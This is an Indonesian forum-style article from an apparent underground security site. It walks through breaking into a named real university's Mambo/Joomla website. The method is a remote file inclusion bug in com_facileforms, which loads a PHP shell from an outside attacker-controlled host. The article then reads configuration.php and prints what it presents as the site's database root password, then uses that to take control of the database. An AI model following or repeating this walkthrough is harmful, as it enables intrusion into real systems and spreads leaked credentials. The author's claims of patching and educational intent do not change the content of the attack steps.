www.sekuritionline.net
-= Home =- -= Contact =- -= Register =- -= Manifesto =- -= Forum =- -= Baju SO =- -= FreeMail =-
T-Shirt S-O
Baju-SO
Login Panel
Username:
Password:
Remember Me

Not registered?
Register now!

Forgot your password?
FreeMail
Email Login :
Password :
New users
sign up!!!
powered by Everyone.net
Users Online
Online Now: 3
0 Members | 3 Guests
Our IRC Channel
IRC Channel:
#sekuritionline

IRC Nettwork:
irc.dal.net

Connect to channel
Banner Motd
sekuritionline.net



 
 
Bangga mendukung terlaksananya idsecconf 2008
Linker kami
Copy & paste Coding Dibawah ini
Untuk Banner kami
==================================
<a href="http://www.sekuritionline.net/"
target="_blank"><img src=
"http://www.sekuritionline.net/
banner/banner.gif" width="125" height="75"
alt="sekuritionline.net" title="SO-Te@m"
border="0" /></a>
Best View

Best View : 1024 x 768

IP

Page Ranking Tool
Simple Counter
2951
Exploits

--------------------------------

Info

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Untuk artikel yang memang membutuhkan gambar / foto sekiranya rekan-rekan dapat
mengirim artikel memakai file berbentuk .ZIP atau .RAR dan di email ke artikel@sekuritionline.net
Perhatian Pengiriman Artikel diharuskan melakukan Registrasi terlebih dahulu....
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
New !!! dapatkan FreeMail namakamu@sekuritionline.net Klik Disini


PWD
Crack

Base64
Crack

MD5
Crack

Test
Speed


Thanks : OurFamily, All Indonesian Community Underground ....

irc.dal.net #sekuritionline

SAVE PALESTINE
#So
"Dalam dunia digital aku berdiri diatas Aliran bit yang penuh dengan keindahan ,
semua diciptakan dengan perasaan tanpa beban dan tanpa paksaan ,
tidak berdiri diatas keangkuhan semata tetapi menunduk dibawah kebenaran …
"

 

Search Engine
Key Word(s): Search By:  
Current Time/Date
January 26, 2009, 6:28 pm
Articles
By cyberlog
Published: April 28, 2007
Print    Email

Bila anda sering melakukan deface hal semacam ini mungkin biasa, jadi mohon maaf bila tulisan ini tidak tepat bagi seorang Defaceman mania.
Penulis akan menerangkan untuk melihat suatu database dapat dilakukan lewat Shell Injection, tidak selalu harus melihat memakai Phpmyadmin, Disini anda diharuskan mencari target terlebih dahulu, baru kemudian mencari tahu kelemahan / Bug yang terdapat dalam target tersebut

Ok langsung aja , terserah anda mau memakai bantuan Google Uncle, Bostscan IRC, or Tool lainnya, anggap saja target telah anda dapatkan, disini penulis ambil contoh yaitu www.univpancasila.ac.id [Pancasila merupakan Universitas ternama di Jakarta ].

Langkah pertama adalah menganalisa web tersebut dengan jalan memberikan inputan ke dalam browsing, www.univpancasila.ac.id/administrator

Maka akan tampil tampilan seperti dibawah ini :




Kita bisa melihat bahwa situs kampus pancasila menggunakan Open Source Php Mambo / Jomla setelah itu anda dapat mencari Bug / Kelemahan Mambo Php di Situs-situs Underground Seperti milw0rm, security focus, Dll
Disini didapatkan suatu Bug yang ada yaitu com_facileforms, Kemudian kita bisa ambil Vulnerable / Bug yang ada yaitucom_facileforms/facileforms.frame.php?ff_compath=

Nah sekarang saatnya untuk kita coba linkan dari phpshell kita ketempat bug yang bermasalah, untuk linknya adalah

http://www.univpancasila.ac.id/components/com_facileforms/facileforms.frame.php?ff_compath=
http://cyberlog.t35.com/tool/inject.txt
?

Maka akan didapat tampilan seperti dibawah ini :



Ternyata kita masuk lewat dari Shell Php kita, setelah itu kita harus mencari tahu user, pass, name database target, Disini secara default informasi tersebut berada di file Config.php atau Configuration.php yang ada di Halaman Root target.
Neh Halaman Untuk mencari File Config.php :



Ups dapat kita lihat disitu ada file Configuration.php, lihat apakah ada informasi untuk masuk kedalam databse tersebut, buka file Configuration.php dan akan nampak hasil yang ada [ untuk hal ini sama sewaktu Penulis melakukan injection kedalam Situs Bsi.ac.id dan melihat Config.php untuk masuk kedalam databse tersebut ] dimana file configuration.php merupakan link untuk masuk ke dalam database situs tersebut.




Nah kita perhatikan didalam file configuration.php ada beberapa hal penting, yaitu :
Host : Localhost
User : Root
Pass : L0nt0ngk4r1
Database : pancasila1
===============================
Untuk masuk kedalam database situs pancasila cukup mudah kita tidak usah repot-repot mencari File databasenya cukup dengan mengklik SQL yang ada disamping Php-code, akan nampak hasil seperti dibawah ini :




Masukkan Username, password, database di Sql Manager, klik Connect, maka akan tampil halaman database Pancasila




Ups ternyata cukup mudah untuk masuk kedalam database situs tanpa kita harus tahu letak dari database tersebut dan anda dapat melakukan control penuh terhadap databse tersebut. [ ga bisa dibayangkan bila ada orang yang berniat jelek , bisa2 database di delete or dirubah ] Semoga jangan sampai terjadi

Note :

  • Untuk Bug yang ada di situs www.univpancasila.ac.id telah berhasil ditutup

  • Kami hanya melakukan penetrasi, tidak merusak atau merubah database pancasila

  • Untuk Admin harap melakukan update pacth secara continue agar terhindar dari serangan injection [ maklum mambo banyak bug yang bermasalah ].

  • Tulisan ini murni sebagai pembelajaran untuk kami, anda, dan semua bahwa tidak selamanya system yang dibangun secara Online aman.

  • Untuk para newbie mohon untuk tidak merusak bila anda berhasil masuk

Kedalam target, jadikan bahwa ‘ Hacking is Art ‘ dan bantu admin untuk melakukan patching/menutup bug yang ada.


Special for : Yayang Erni [ moga cepat sembuh ]


View Comments (0)